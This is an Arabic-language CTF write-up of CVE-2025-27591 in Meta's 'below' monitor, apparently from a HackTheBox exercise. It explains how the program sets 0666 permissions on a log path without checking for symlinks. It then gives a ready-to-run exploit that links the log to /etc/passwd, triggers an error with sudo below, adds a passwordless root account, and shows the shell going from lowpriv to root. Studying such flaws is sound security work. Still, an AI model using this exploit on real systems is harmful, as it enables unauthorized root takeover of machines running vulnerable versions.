
CVE-2025-27591 – Meta below تصعيد الامتيازات المحلية عبر اتباع الروابط الرمزية (HackTheBox CTF)
below| الحقل | التفاصيل |
|---|---|
| CVE | CVE-2025-27591 |
| البرنامج | Meta below (مراقب موارد النظام) |
| الإصدارات المتأثرة | < 0.9.0 |
| الثغرة | اتباع الروابط الرمزية → الكتابة العشوائية على الملفات كجذر |
| المصادقة | مستخدم محلي مع صلاحية sudo لـ below |
| التأثير | تصعيد صلاحيات محلي إلى الجذر |
| السياق | اُكتشف خلال مسابقة HackTheBox CTF |
أداة مراقبة موارد النظام below (من Meta Platforms, Inc.) تحتوي على ثغرة في آلية تسجيل الأخطاء. عند تشغيلها عبر sudo، تقوم بقوة بتعيين أذونات 0666 على ملفات السجل الموجودة في /var/log/below/ دون التحقق أولاً مما إذا كان المسار المستهدف رابطًا رمزيًا. وهذا يسمح لمهاجم محلي باستبدال ملف السجل برابط رمزي يشير إلى أي ملف قابل للكتابة كجذر، مما يؤدي فعليًا إلى استبداله بمحتوى مسيطر عليه.
يقوم كود التسجيل في below < 0.9.0 بتنفيذ هذه العمليات بالتسلسل عند تشغيله كجذر:
/var/log/below/error_root.logchmod(path, 0o666) — دون التحقق مما إذا كان رابطًا رمزيًافي الخطوة 4، إذا تم استبدال المسار برابط رمزي قبل التنفيذ، فإن الكتابة تذهب إلى هدف الرابط الرمزي بدلاً من ذلك.
مستخدم محلي
│
▼
إزالة /var/log/below/error_root.log
│
▼
إنشاء رابط رمزي: /var/log/below/error_root.log → /etc/passwd
│
▼
تشغيل الخطأ عبر: sudo /usr/bin/below replay --time "invalid"
│ (يفتح below ملف السجل، chmod 0666 يضرب /etc/passwd، يكتب الخطأ)
▼
/etc/passwd أصبح قابلاً للكتابة عالمياً
│
▼
إضافة إدخال جذر مارق: rooted::0:0:root:/root:/bin/bash
│
▼
su rooted → غلاف جذر
--time "invalid"تمرير سلسلة زمنية غير صالحة يجبر below على تسجيل رسالة خطأ. يصل مسار الخطأ إلى كود التسجيل الذي يكتب بشكل أعمى إلى الملف، والذي أصبح الآن رابطنا الرمزي.
chmod +x exploit.sh
./exploit.sh
المتطلب الأساسي: يجب أن يكون لدى المستخدم الحالي صلاحيات
sudoلتنفيذ/usr/bin/below.
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root
تم إصلاح الثغرة في إصدار below 0.9.0. يقدم الإصلاح فحصًا للرابط الرمزي قبل أي عمليات ملف في مسار التسجيل.